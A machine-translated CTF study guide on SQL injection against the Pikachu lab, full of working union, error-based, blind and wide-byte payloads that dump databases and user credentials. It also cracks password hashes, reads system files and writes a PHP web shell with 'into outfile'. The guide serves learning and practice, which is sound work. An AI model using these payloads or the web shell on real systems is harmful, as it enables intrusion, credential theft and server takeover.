CTF study notes - SQL injection

SQL injection

Classification of sql injection

1) Echoable injection

Injection that can be combined with queries
Error injection
Make DNS requests through injection, so as to achieve the purpose of echoing

2) Non-echoable injection

bool blind
time blind

3) Second injection

It usually appears as a topic with complex business logic, and you generally need to write your own scripts to achieve automatic injection. SQL injection is very common in CTF competitions, involving various databases. In general CTF competitions, the question maker will add a layer of WAF in disguise (for example, to filter keywords, etc.), and then only leave a problem-solving path of thinking. At this time, we need to quickly find and bypass this point. Then get the flag.

Unionable query injection

This will generally echo the query results, close the single quotation marks, and then comment the following query statements of union itself. Generally need to bypass some specific words (space, select, and, or, etc.)

Error injection

1）updatexml

In essence, the function reports an error

The following payload:

updatexml(XML_document,XPath_string,new_value);

• XML_document: String format, which is XML_documentString format, which is the name of the XML document object;

• DocXPath_string: String in XPath format ;

• new_value: String format, replace the name of the found data document object that meets the criteria;

The principle of error injection: the concat() function connects it into a string, so it will not conform to the format of XPATH_string, resulting in a format error and breaking the user

0x7eASCII code, in fact _{, the error message of upadtexml() is special characters, letters and the following content. In order to lose the previous letters, a special character is connected at the beginning} .

Common error injection statements

查询到数据库版本
and (updatexml(1,concat(0x7e,(select version()),0x7e),1))

查询当前数据库
and (updatexml(1,concat(0x7e,(select database()),0x7e),1))

获取当前数据库表名结构
and (updatexml(1,concat(0x7e,(select(select group_concat(table_name) from information_schema.tables where table_schema=database())),0x7e),1))

查询该表的字段
and (updatexml(1,concat(0x7e,(select(select group_concat(column_name) from information_schema.columns where table_schema =database() and table_name='users')),0x7e),1))

查询字段中的内容
and (updatexml(1,concat(0x7e,(select(select group_concat(concat(role,0x7e,username,0x3A,password,0x7e)) from users)),0x7e),1))

2)floor

Simply put, the principle of floor error reporting is the conflict between rand and order by or group by. When group by inserts data into the temporary table, due to multiple calculations of rand(), the primary key is repeated when inserting into the temporary table, thus reporting an error, and because the SQL statement or function in concat() was executed before the error was reported, the statement reported an error and was rejected The thrown primary key is the result of executing the SQL statement or function.

For specific principles, please refer to https://www.secpulse.com/archives/140616.html or (52 messages) Analysis of floor error injection principle_migi@forever's blog-CSDN blog_floor error

爆库
id=1' and (select 1 from (select count(*),concat(0x7e,(select database()),0x7e,floor(rand(0)*2)) x from information_schema.tables group by x) a) %23

爆表明
id=1' and (select 1 from (select count(*),concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e,floor(rand(0)*2)) x from information_schema.tables group by x) a) %23
爆字段
id=1' and (select 1 from (select count(*),concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e,floor(rand(0)*2)) x from information_schema.tables group by x) a) %23
爆内容
id=1' and (select 1 from (select count(*),concat(0x7e,(select concat_ws(':',username,password) from users limit 0,1),0x7e,floor(rand(0)*2)) x from information_schema.tables group by x) a) %23

3）exp

The essence of exp() error reporting is overflow error reporting. exp is an exponential function with e as the base. However, if the number is too large, overflow will occur. The exp function will overflow and report an error when the parameter is greater than 709.

Through the subquery and bitwise negation, a DOUBLE overflow error is caused, and the data is injected.

mysql> select * from users where id=1 and exp(~(select * from (select database())a));
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select `a`.`database()` from (select database() AS `database()`) `a`)))'

In the scripting language, some expressions in the error will be converted into corresponding strings. This enables error injection.

4) other

For more knowledge about error injection, see: SQL Injection - Error Injection_Qwzf's Blog - CSDN Blog

Bool Blind

When the developer blocks the error message, we cannot perform error injection. But true and false have different echoes, such as returning access when true, returning false when false; or returning to a normal page when true, jumping to an error page when false, etc.

The principle of Boolean blind injection is to use and or or to splice statements that return Boolean values. When the statement result is true, the page displays one result, and when the statement result is false, the page displays another result, so as to judge whether the statement result is true, and according to Information about this blast. Time-consuming and labor-intensive, generally use tools or write scripts to crack.

The main performance of the blind injection based on boolean:
1. No error message
2. Whether it is a correct input or a wrong input, only two cases are displayed (we can think of it as 0 or 1)
3. Under the correct input, the input and 1=1/and 1= 2 found that it can be judged

process

1. Judgment injection:
id=1'and 1=2#. If an exception is displayed, it means that the content after and has been successfully executed, so there may be bool type SQL injection.

2. Demonstration of the explosion library sample:

id=1'and length(database())>10#-- store manager

id=1'and ascii(mid(database(),1,1))>115#– library name

3. Sample demonstration of explosive table:

id=1'and ascii(mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100#

4. Sample demonstration of burst fields:

id=1'and ascii(mid((select% column_name from information_schema.columns where%20table_name='users'and table_schema=database() limit 0,1),1,1))>1000#

5. Demonstration of burst data sample:

id=1'and ascii(mid((select username from users limit 0,1),1,1))>1#

Common functions

1) Interception function

2) Conversion function

3) Comparison function

time blind

sleep() is a function used for sleep in SQL statements, commonly used in blind time injection, sleep(x) can make the program sleep for x seconds.

1. Judgment injection:

id=1'and sleep(10)#If there is a significant delay in the response time of the web page, it indicates that there is a time-based SQL injection.

2. Demonstration of the explosion library sample:

id=1'and sleep(if(length(database())>10,10,1))>10#--库长

id=1'and sleep(if(ascii(mid(database(),1,1))>115,10,1))#– library name

3. Sample demonstration of explosive table:

id=1'and sleep(if((ascii(mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100),10,1))#

4. Sample demonstration of burst fields:

id=1'and sleep(if(ascii(mid((select% column_name from information_schema.columns where%20table_name='users'and table_schema=database() limit 0,1),1,1))>1000,10,1))#

5. Demonstration of burst data sample:

id=1'and sleep(if(ascii(mid((select username from users limit 0,1),1,1))>1,10,1))#

Common functions

1) Delay function

secondary injection

The reason for the secondary injection is that some filtering and escaping were performed when the data was first entered into the database. When this piece of data was retrieved from the database and spliced ​​in the SQL statement, but no filtering was performed during this splicing, We can execute the constructed SQL statement.
Since the business logic of the secondary injection is more complicated, it is generally difficult to find it in the competition, so the question maker will generally release the source code, or remind that there is a secondary injection in this question.
In the topic of secondary injection, it is generally not a simple secondary injection, and it is usually combined with error reporting or Bool blind injection. For example, the user name entered on the registration page will only be echoed blindly after logging in. At this time, we need to write scripts to simulate registration and login.

Injection after limit

The research found that when the MySQL version number is greater than 5.0.0 and less than 5.6.6, injection can be performed in the following locations: SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT {injection_point} can also be injected using the following
Payload :
SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1 procedure analyze(extractvalue(rand() ,concat ( Ox3a , version())),1);

Location and discovery of injection points

1. Common injection point locations
In CTF, what we encounter is not necessarily the case where the injection point is the username field in the form. Sometimes the injection point will be hidden in different places. Let’s introduce a few common injection points below. s position.
(1) Injection in GET parameters
The injection point in GET is generally the easiest to find, because we can get the URL and parameters in the address bar, and we can use Sqlmap or manually verify whether there is injection.
(2) Injection in POST
The injection point in POST generally requires us to find out through packet capture operations, such as using Burp or the browser plug-in Hackbar to send POST packets. Similarly, Sqlmap or manual verification can also be used.
(3) Injection in User-Agent
When you want to find injection in User-Agent, I recommend you to use Burp's Repeater module or Sqlmap. Set the parameter of Sqlmap to level=3, so that Sqlmap will automatically detect whether there is an injection in the User-Agent. Note
(4) Injection in Cookies
If you want to find injection in Cookies, I also recommend you to use Burp's Repeater module. Of course, in Sqlmap, we can also set the parameter to level=2, so that Sqlmap will automatically detect whether there is injection in Cookies.

2. Judging whether the injection point exists
The next step is to determine the location of the injection point. When judging whether there is an injection at the input point, you can first assume that the SQL statement executed by the original program

Then use the following methods to judge: (1) Inserting single quotation marks
Inserting single quotation marks is the most commonly used detection method. The principle is that unclosed single quotation marks will cause an error that the single quotation mark in the SQL statement is not closed.
(2) The digital type is judged
by and 1=1 (digital type) and the closed single quotation mark test statement 'and 'l'='1 (string type). The purpose of using Payload '1'='1 here is to Single quotes after the closing original statement.
(3) Judgment by addition and subtraction of numbers
For example, if we catch the link in the problem we encountered http://example.com/?id=2, we can try the following http://example.com/?id=3-1. If the result is http://example.com/?id=2the same as , it proves that there may be a SQL injection vulnerability at the input point of id.

bypass

Reference (80 messages) Summary of sql injection bypass methods_huanghelouzi's blog-CSDN blog_sql bypass

SQL read and write files

There are SQL injection vulnerabilities in some competition topics, but the flag is not in the database. At this time, it is necessary to consider whether to read files or write Shell to further infiltrate.

Basic conditions for reading and writing files
The current user authority can read the file.
The file is on this server.
The path is complete.
File size is less than max_sllowed_packet.
The current database user has FILE permission, and File_priv is yes
. The value of secure_file_priv is empty. If the value is a certain directory, then only the files in this directory can be operated.

practise:

pikachu SQL injection - digital injection (post)

1. page display

The page can select numbers to select, return data, username and email.

2. We carefully observe the url of the page and find out? id=xxx, and there is no change in our manual input, so it is guessed that this title is a post request instead of a get request, and it is impossible to use url to pass parameters.

[External link picture transfer failed, the source site may have an anti-leeching mechanism, it is recommended to save the picture and upload it directly (img-XsJjMX8i-1661398104748) (C:\Users\SuZhe\Documents\MD Documents\CTF Special Training Camp\image- 20220821143207160.png)]

3. We used burpsuite to capture packets and found that it was a get request.

4. We modify the parameters and perform sql injection.

首先回忆一下sql注入的基本流程：
1.判断是否存在注入
2.判断字段数
3.判断显错位
4.判断库名
5.判断表名
6.判断列名
7.寻找具体数据
这里很显然存在注入，咱们就直接从第二步开始

1) Judgment number of characters

payload: id=3 order by 3&submit=%E6%9F%A5%E8%AF%A2
The result is as follows:

[External link picture transfer failed, the source site may have an anti-leeching mechanism, it is recommended to save the picture and upload it directly (img-n4ORtTPP-1661398104749) (C:\Users\SuZhe\Documents\MD Documents\CTF Special Training Camp\image- 20220821143543641.png)]

Then the result of order by 2:

From this we judge that the number of fields is 2

2) Judging the display error

In fact, it is obvious that both of them are misplaced here, but we still try
the payload: id=3 union select 1,2&submit=%E6%9F%A5%E8%AF%A2
the results are as follows:

The result is that 1 and 2 are obviously wrong bits

3) Determine the library name

payload：id=3 union select 1,database()&submit=%E6%9F%A5%E8%AF%A2

As a result, the library name is pikachu

4) Judging the table name
payload: id=3 union select group_concat(table_name),2 from information_schema.tables where table_schema=database()#&submit=%E6%9F%A5%E8%AF%A2
the results are as follows:

[External link picture transfer failed, the source site may have an anti-leeching mechanism, it is recommended to save the picture and upload it directly (img-xkAXb2c3-1661398104751) (C:\Users\SuZhe\Documents\MD Documents\CTF Special Training Camp\image- 20220821145637992.png)]

So we get table names: httpinfo,member,message,users,xssblind

5) Judging the column name

Since we can judge that the data should be in the users table, we blast the columns of the users table.
payload: id=1 union select group_concat(column_name),2 from information_schema.columns where table_name='users'#&submit=%E6%9F%A5%E8%AF%A2
The result is as follows:

[External link picture transfer failed, the source site may have an anti-leeching mechanism, it is recommended to save the picture and upload it directly (img-ztVnjzr4-1661398104754) (C:\Users\SuZhe\Documents\MD Documents\CTF Special Training Camp\image- 20220821145832237.png)]

6) get data

We perform data blasting on the username and password columns.
payload:id=1 union select username,password from users#&submit=%E6%9F%A5%E8%AF%A2

The result is as follows:

Thus, this question is completed, and the general ctf question will have a flag here. The type of this question should belong to the injection that can use the joint query in the injection that can be echoed in the previous knowledge points.

5. Further cracking
   I read the tutorials on the Internet and found that this level is more than that. We observed that the style of this password is a bit like md5, so we used the password of admin to decrypt md5. The online decryption website: md5 online decryption crack, md5 decryption encryption ( cmd5 .com)
   

The result is that the password of admin is 123456, the password of pikachu is 000000, and the password of test is abc123.

6. Read the file
   payload:id=1 union select load_file('C:/Windows/win.ini'),1 from users#&submit=%E6%9F%A5%E8%AF%A2

7. Write the backdoor
   payload: id=1 union select 1,'<?php assert($_POST[1]);?>' into outfile 'D:\software\phpstudy_pro\WWW\pikachu-master\pikachu-master\1.php'#&submit=%E6%9F%A5%E8%AF%A2
   At this point, the backdoor Trojan horse has been written. According to the process, you can use Ant Sword to connect to get control of the website. Here, since we are a shooting range built locally, we directly open the file directory to see if it has been written successfully.

pikachu SQL injection - character injection (get)

1. interface display

   We can see that the interface is an input box for us to enter the user name. According to the name of the question (get), we can know that this is a get request, so we can directly pass parameters in the url. You can do without burpsuite.
   

   Let's input one at random first, and we can get one that follows? name=xxx url, and it shows that the username you entered does not exist.

   [External link picture transfer failed, the source site may have an anti-leeching mechanism, it is recommended to save the picture and upload it directly (img-gPXgHmnr-1661398104758) (C:\Users\SuZhe\Documents\MD Documents\CTF Special Training Camp\image- 20220821162145523.png)]

   2. echoable injection

   We still follow the general process to inject.
   1) Judging the number of fields
   payload:?name=fancy' order by 2%23&submit=%E6%9F%A5%E8%AF%A2

   The %23 in the payload is #, because # in the url has a special meaning, so it needs to be escaped.
   The result is as follows:

   

   We get the number of fields as 2.
   2) Judging the display error bit
   payload:?name=fancy%27%20union%20select%201,2%23&submit=查询

   Note here that since this is a character injection, it is still different from the digital payload in the previous level. There is a ` symbol and
   the result is as follows:

   
   3) Determine the database
   payload:?name=fancy%27%20union%20select%201,database()%23&submit=查询

   Library name: pikachu

   4) Judgment table name
   payload: ?name=fancy%27%20union%20select%201,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()%23&submit=查询
   Result: httpinfo, member, message, users, xssblind
   5) Judgment class name

   payload: ?name=fancy%27%20union%20select%201,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27%23&submit=查询
   Result: USER, CURRENT_CONNECTIONS, TOTAL_CONNECTIONS, id, username, password, level
   6) Get the specific data
   payload: ?name=fancy' union select username,password from users%23&submit=%E6%9F%A5%E8%AF%A2
   Result:
   [External link picture transfer failed, the source site may have an anti-leeching mechanism, it is recommended to save the picture and upload it directly ( img-nMRfhGMB-1661398104759)(C:\Users\SuZhe\Documents\MD Documents\CTF Special Training Camp\image-20220821164131105.png)]

   7) Read the file

   payload：http://192.168.101.16/pikachu/vul/sqli/sqli_str.php?name=fancy' union select 1,load_file('C:/Windows/win.ini')%23&submit=%E6%9F%A5%E8%AF%A2
   8）写马payload：http://192.168.101.16/pikachu/vul/sqli/sqli_str.php?name=fancy' union select 1,'<?php assert($_POST[2]); ?>' into outfile 'C:/phpstudy_pro/WWW/pikachu/vul/sqli/2.php'%23&submit=%E6%9F%A5%E8%AF%A2

   All in all: For these two questions, just pay attention to the difference between get and post, and the difference in payload structure. In fact, the process and content are not bad.

The difference between numeric injection and character injection

digital

When the input parameter x is an integer, the Sql statement type in the source code is generally as follows:select * from <表名> where id = x

This type can be judged by the classic and 1=1 and and 1=2:
Enter in the Url address www.xxx.com/abc.php?id= x and 1=1, the page is still running normally, and proceed to the next step.

If you continue to enter the Url address www.xxx.com/abc.php?id= x and 1=2and the page runs incorrectly, it means that the Sql injection is a digital injection.

character type

When the input parameter x is a character type, the SQL statement type in abc.php is generally as follows

select * from <表名> where id = ‘x’

We can also use and '1'='1 and and '1'='2 to judge this type:

Enter the Url address www.xxx.com/abc.php?id= x’ and ‘1’='1

The page works fine, move on to the next step.

Continue typing in the Url address www.xxx.com/abc.php?id= x’ and ‘1’='2

If the page runs incorrectly, it means that the Sql injection is a character type injection.

pikachu SQL injection - search injection

The sql statement related to search injection is probably in the form of select xxcolumns from xxtable where param like '%input%'. The essence is still character injection, but the closure is different.

1. The interface displays
   [External link picture transfer failed, the source site may have an anti-leeching mechanism, it is recommended to save the picture and upload it directly (img-FhbS2R5j-1661398104760) (C:\Users\SuZhe\Documents\MD Documents\CTF Special Training Camp\ image-20220821172926400-16610741682063.png)]
2. Idea analysis

Since it is a search type, the first thing we need to do is to close the search, and then add our own query statement to form the payload.

1) We first use a ' to test if this is a closure
?name=ad'&submit=搜索

The result is as follows:

Let's try again and ?name=ad%27%23&submit=搜索the result is no error, indicating that this is the closed method

3. keep injecting

The remaining ideas are almost the same as the previous question, so I will omit it here.

pikachu SQL injection - xx type injection

The essence is still character injection, but the closure is not so simple. Therefore, the key to this question is to find the closure

1. Test
   First use: payload: ?name=fancy'&submit=%E6%9F%A5%E8%AF%A2The results are as follows:

From this, it is judged that the closure is **')**, so the payload is used: ?name=fancy')%23&submit=%E6%9F%A5%E8%AF%A2no error is reported, and the explanation is correct.

[External link picture transfer failed, the source site may have an anti-leeching mechanism, it is recommended to save the picture and upload it directly (img-st27Mp4O-1661398104762) (C:\Users\SuZhe\Documents\MD Documents\CTF Special Training Camp\image- 20220821174941349.png)]

The following routines are also the same, and are omitted here.

pikachu SQL injection-insert injection (blind injection)

The sql statement related to insert type injection is probably in the form of INSERT INTO table name VALUES (value 1, value 2,…) or INSERT INTO table_name (column 1, column 2,…) VALUES (value 1, value 2,…).

The sql statement related to update type injection is probably in the form of UPDATE table name SET column name = new value WHERE column name = certain value.

1. interface display

(1) Insert injection
If there is an insert injection, it should be on the registration page to insert data. Since there is no echo, it is an error injection. So we go to the registration page. The content is as follows:

[External link picture transfer failed, the source site may have an anti-leeching mechanism, it is recommended to save the picture and upload it directly (img-ATW1tKjw-1661398104763) (C:\Users\SuZhe\Documents\MD Documents\CTF Special Training Camp\image- 20220821175333523.png)]

First, we grab a package, check it and find that it is a post request. The parameters are as follows:

So let's look for a closure, and add ') after the last parameter, as shown in the figure below.

[External link picture transfer failed, the source site may have an anti-leeching mechanism, it is recommended to save the picture and upload it directly (img-5eFVRFEo-1661398104764) (C:\Users\SuZhe\Documents\MD Documents\CTF Special Training Camp\image- 20220821180034295.png)]

We found that this is indeed the closure, but since the page is not echoed, it cannot be operated like the previous questions. However, it can be seen from the previous step that if there is a problem with the sql statement during registration, an error will be reported, so we use error injection.

1) Explosive library
payload:username=xixi' or updatexml(1,concat(0x7e,(select database()),0x7e),1) or '&password=666666&sex=&phonenum=&email=&add=&submit=submit

[External link picture transfer failed, the source site may have an anti-leeching mechanism, it is recommended to save the picture and upload it directly (img-IIA1aO5k-1661398104765) (C:\Users\SuZhe\Documents\MD Documents\CTF Special Training Camp\image- 20220821191841343.png)]

2) Explosive
payload:username= ' or updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,31),0x7e),1) or '&password=666666&sex=&phonenum=&email=&add=&submit=submit

payload: username= ' or updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),32,31),0x7e),1) or '&password=666666&sex=&phonenum=&email=&add=&submit=submit
Note: The reason why there are two payloads here is because the data length has exceeded the display range of the updatexml function (32 characters are displayed), and the substr() function needs to be added to the payload to display the remaining characters.

3) Exploding
payload:username= ' or updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name='users'),1,31),0x7e),1) or '&password=666666&sex=&phonenum=&email=&add=&submit=submit

payload：username= ' or updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name='users'),32,31),0x7e),1) or '&password=666666&sex=&phonenum=&email=&add=&submit=submit

payload：username= ' or updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name='users'),63,31),0x7e),1) or '&password=666666&sex=&phonenum=&email=&add=&submit=submit

4) Explosive data

payload：username= ' or updatexml(1,concat(0x7e,substr((select group_concat(concat(username,';',password)) from users),1,31),0x7e),1) or '&password=666666&sex=&phonenum=&email=&add=&submit=submit

payload：username= ' or updatexml(1,concat(0x7e,substr((select group_concat(concat(username,';',password)) from users),32,31),0x7e),1) or '&password=666666&sex=&phonenum=&email=&add=&submit=submit

pikachu SQL injection-update injection

The update injection part is to inject the information modification page. We can first register an account and log in. After the login is completed, there will be a button to modify the personal information. We click on it. The interface is as follows:

Then capture the packet and find that this is still a post request, and the rest of the operation is almost the same as that of instert.

pikachu SQL injection-delete injection

The sql statement related to delete type injection is probably in the form of DELETE FROM table name WHERE column name = value.
Interface display:

Since it is a delete injection, let's add a message first, and then capture the delete operation, and find that there are several GET request packets

Then we should be able to think of injecting through the url. We have also understood the injection method of this get request before. Moreover, there is no direct echo here, so we use error injection.

1) Explosive library
payload:?id=57 or updatexml(1,concat(0x7e,(select database()),0x7e),1)

Note here, we need to inject on the url of the web page, not directly on burpsuite:

Doing so will result in the following error

2) The rest of the content is omitted, and the payload and insert are injected exactly the same

pikachu SQL injection - http header injection

Interface display:

This is the initial interface:

If we observe carefully, we will find a prompt in the upper right corner, which will directly give our user name and password.
[External link picture transfer failed, the source site may have an anti-leeching mechanism, it is recommended to save the picture and upload it directly (img-9EJ88TcA-1661398104771) (C:\Users\SuZhe\Documents\MD Documents\CTF Special Training Camp\image- 20220823222530120.png)]

When we enter the username and password, it will look like this:

[External link picture transfer failed, the source site may have an anti-leeching mechanism, it is recommended to save the picture and upload it directly (img-uMQZz8zk-1661398104771) (C:\Users\SuZhe\Documents\MD Documents\CTF Special Training Camp\image- 20220823221429553.png)]

This question is very interesting. The website does not care about your user name and password, but gets your user agent and http accept information, as well as your host (id address). Although it is also a post request , it is obviously not appropriate if you use the post request method to inject now. After all, the topic says that it is http header injection.
We first captured the packets and found the following packets:

At this time, did someone take the post package and inject it? Well, I tried it here, but it doesn’t work, because it seems to be automatically redirected to another page, so what we really need to deal with is the following GET request packet.

1) To determine the existence of injection,
we first manipulate the user agent and add a "'" symbol after the User-Agent (here, because the user-agent is a string of strings, we have reason to suspect that it is closed with the "'" symbol ). If it is found that an error is reported, it means that it can be injected here.

2) Explosive library

We User-Agent: 1' or updatexml(1,concat(0x7e,database()),0) or 'can modify it to get:

Then the subsequent operation is the conventional error injection process.

Boolean Blind

The principle of Boolean blind injection is to use and or or to splice statements that return Boolean values. When the statement result is true, the page displays one result, and when the statement result is false, the page displays another result, so as to judge whether the statement result is true, and according to Information about this blast. Time-consuming and labor-intensive, generally use tools or write scripts to crack.

The main performance of the blind injection based on boolean:
1. No error message
2. Whether it is a correct input or a wrong input, only two cases are displayed (we can think of it as 0 or 1)
3. Under the correct input, the input and 1=1/and 1= 2 found that it can be judged

1) Judging the existence of injection
1. Input kobe' and 1=1#, you will get

[External link picture transfer failed, the source site may have an anti-leeching mechanism, it is recommended to save the picture and upload it directly (img-cZtRSi8S-1661398104774) (C:\Users\SuZhe\Documents\MD Documents\CTF Special Training Camp\image- 20220824161929863.png)]

2. Input kobe' and 1=2#, you will get

From this it was found that the page displays different content when the conditions are true and false. So our idea is to connect conditional statements after and to determine whether our conditional statements are correct to find the answer.

The test example is given below
kobe' and ascii(substr(database(),1,1))>113#

kobe' and ascii(substr((select TABLE_NAME from INFORMATION_SCHEMA.tables where TABLE_SCHEMA=database() limit 0,1),1,1))<112#

time blind

When using blind time injection, you can’t see anything, and you can’t judge whether your statement is executed from the difference in the display. So what to do, use sleep()

1) Judging the injection
We kobe' and sleep(3)#can clearly feel that he has been delayed for a long time and then swipe out of the text, so we can judge the existence of injection.

2) Continue to judge
We can use kobe' and if((substr(database(),1,1))='p',sleep(5),null)#sentences such as this to judge whether our guess is right or not and find the answer step by step, but it is extremely time-consuming and troublesome.

wide byte injection

principle:

(1) The conditions for wide byte injection are: when PHP sends a request to MySql, the statement SET NAMES 'gbk' or set character_set_client =gbk is used to encode once

(2) The reason for wide byte injection is: special characters such as single quotes and double quotes are escaped

(3) The principle of wide byte injection is: when the \ used for escape is ASCII coded, and the parameters passed in by the client are encoded as wide byte codes such as GBK, you can insert a hexadecimal character before \ section (the ASCII code must be greater than 128 to reach the range of Chinese characters) to make mysql think that the inserted byte and \ are a Chinese character, thus eating up \ and destroying the escape.

We first use burpsuite to capture packets and change parameters in the data area. First we fill in kobe as this is a known user

1) Judgment injection
We enter the following contentname=kobe%df' union select 1,2#&submit=%E6%9F%A5%E8%AF%A2

Indicates deposit injection, and the echo digits are 1 and 2 digits.

2) Explosive library

name=kobe%df' union select database(),user() #&submit=%E6%9F%A5%E8%AF%A2

I won’t go into details for the follow-up content, just follow the gourd and draw a scoop, remember to avoid the symbol

3) Points to note

1. It is not acceptable to use such a statement union select 1,table_name from information_schema.tables where table_name='users'#. This is because ', addslashes() escapes ', so it causes an error

2. When statement injection is performed on the page, the injection will also fail. This is because when the request data packet is passed in, the url encoding is performed on the data we input, and %df is transferred to %25df